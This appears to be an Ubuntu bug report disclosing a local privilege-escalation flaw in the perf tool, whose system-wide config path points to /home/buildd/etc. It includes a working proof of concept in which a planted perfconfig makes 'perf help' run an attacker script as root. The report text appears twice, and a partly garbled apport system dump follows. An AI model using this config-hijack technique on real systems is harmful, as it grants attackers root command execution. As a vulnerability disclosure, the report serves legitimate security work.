Perf has 2 types of config files -- user and system-wide. The path to the system-wide config file is set up at the build time.
Instead of using sane /etc/ path Ubuntu uses /home/buildd/etc/. It means a user with write access to this directory may create perfconfig file in the directory, fill it with any data, and wait another user to run perf. perf running as another user will read and parse this config file. The worst outcome is a privilege escalation with arbitrary command execution in case of 'perf help' run.
There are 2 constraints of the attack. First, an attacker has to own /home/buildd/etc/ directory, which means only 'buildd' user may make an attack.
Second, the possible attack is passive, so it can be carried out against users running perf only.
The code for the privilege escalation is as following:
$ which perf_3.2.0-49 | xargs strings | grep /home
/home/buildd
As root:
# useradd -m buildd
# su - buildd
$ id
uid=1001(buildd) gid=1001(buildd) groups=1001(buildd)
$ mkdir etc
$ echo >etc/perfconfig
$ cat >etc/perfconfig <<EOF
[man.shell]
cmd = /home/buildd/shell
[man]
viewer = shell
EOF
$ cat >shell <<EOF
#!/bin/bash
echo 'All your base are belong to us'
id
man "\$@"
EOF
$ chmod a+x shell
Now run these as another user:
# id
uid=0(root) gid=0(root) groups=0(root)
# perf help anything
All your base are belong to us
No manual entry for perf-anything
I also checked Fedora 19 and Debian 8, they are not vulnerable.
Perf has 2 types of config files -- user and system-wide. The path to the system-wide config file is set up at the build time.
Instead of using sane /etc/ path Ubuntu uses /home/buildd/etc/. It means a user with write access to this directory may create perfconfig file in the directory, fill it with any data, and wait another user to run perf. perf running as another user will read and parse this config file. The worst outcome is a privilege escalation with arbitrary command execution in case of 'perf help' run.
There are 2 constraints of the attack. First, an attacker has to own /home/buildd/etc/ directory, which means only 'buildd' user may make an attack.
Second, the possible attack is passive, so it can be carried out against users running perf only.
The code for the privilege escalation is as following:
$ which perf_3.2.0-49 | xargs strings | grep /home
/home/buildd
As root:
# useradd -m buildd
# su - buildd
$ id
uid=1001(buildd) gid=1001(buildd) groups=1001(buildd)
$ mkdir etc
$ echo >etc/perfconfig
$ cat >etc/perfconfig <<EOF
[man.shell]
cmd = /home/buildd/shell
[man]
viewer = shell
EOF
$ cat >shell <<EOF
#!/bin/bash
echo 'All your base are belong to us'
id
man "\$@"
EOF
$ chmod a+x shell
Now run these as another user:
# id
uid=0(root) gid=0(root) groups=0(root)
# perf help anything
All your base are belong to us
No manual entry for perf-anything
I also checked Fedora 19 and Debian 8, they are not vulnerable.
ProblemType: Bug ature: Ubuntu 3.2.0-49.75-generic 3.2.46 controlC0: vasya 3885 F.... pulseaudio 104d5000, 00100005 HDA:80862805, 104d5000, 00100000' ce25728059c2cc9 19 1c2ae5b50030ce6 f3 UUID=000103f6- ab54-473d- 8106-4af4b534c0 ee /vmlinuz- 3.2.0-49- generic root=/dev/ mapper/ vg_cachalot- lv_root ro crashkernel= 384M-2G: 64M,2G- :128M quiet splash vt.handoff=7 ersions: restricted- modules- 3.2.0-49- generic N/A backports- modules- 3.2.0-49- generic N/A asset.tag: N/A asset.tag: N/A version: N/A bvrR2084H4: bd10/13/ 2011:svnSonyCor poration: pnVPCSA3S9R: pvrC609XEG6: rvnSonyCorporat ion:rnVAIO: rvrN/A: cvnSonyCorporat ion:ct10: cvrN/A: version: C609XEG6
DistroRelease: Ubuntu 12.04
Package: linux-tools 3.2.0.49.59
ProcVersionSign
Uname: Linux 3.2.0-49-generic x86_64
AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.24.
ApportVersion: 2.0.1-0ubuntu17.3
Architecture: amd64
ArecordDevices:
**** List of CAPTURE Hardware Devices ****
card 0: PCH [HDA Intel PCH], device 0: ALC275 Analog [ALC275 Analog]
Subdevices: 1/1
Subdevice #0: subdevice #0
AudioDevicesInUse:
USER PID ACCESS COMMAND
/dev/snd/
Card0.Amixer.info:
Card hw:0 'PCH'/'HDA Intel PCH at 0xc9400000 irq 50'
Mixer name : 'Intel CougarPoint HDMI'
Components : 'HDA:10ec0275,
Controls : 26
Simple ctrls : 10
CheckboxSubmission: 8cd6ce4bf8fb309
CheckboxSystem: b633b4f40868d49
Date: Mon Jul 29 21:10:20 2013
HibernationDevice: RESUME=
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
MachineType: Sony Corporation VPCSA3S9R
MarkForUpload: True
ProcFB: 0 inteldrmfb
ProcKernelCmdLine: BOOT_IMAGE=
RelatedPackageV
linux-
linux-
linux-firmware 1.79.4
SourcePackage: linux
StagingDrivers: rts_pstor
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 10/13/2011
dmi.bios.vendor: INSYDE
dmi.bios.version: R2084H4
dmi.board.
dmi.board.name: VAIO
dmi.board.vendor: Sony Corporation
dmi.board.version: N/A
dmi.chassis.
dmi.chassis.type: 10
dmi.chassis.vendor: Sony Corporation
dmi.chassis.
dmi.modalias: dmi:bvnINSYDE:
dmi.product.name: VPCSA3S9R
dmi.product.
dmi.sys.vendor: Sony Corporation